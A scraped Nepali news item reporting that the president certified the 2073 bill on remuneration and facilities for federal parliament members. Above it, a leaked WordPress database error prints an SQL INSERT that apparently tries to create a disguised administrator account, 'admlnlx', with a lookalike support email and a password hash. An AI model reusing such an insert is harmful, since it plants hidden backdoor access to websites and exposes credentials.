WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzEBLph0yvNeX4wlJkSzAvwdRNcGQj/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:14:42', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ७ –
राष्ट्रपति विद्यादेवी भण्डारीले ‘सङ्घीय संसद्का पदाधिकारी तथा सदस्यहरुको पारिश्रमिक र सुविधासम्बन्धी विधेयक, २०७३’ आज प्रमाणीकरण गर्नुभएको छ ।
व्यवस्थापिका–संसद्को गत मङ्सिर ५ गतेको बैठकले सो विधेयक पारित गरेको थियो । नेपालको संविधानबमोजिम राष्ट्रपतिले सो विधेयक प्रमाणीकरण गर्नुभएको हो । -रासस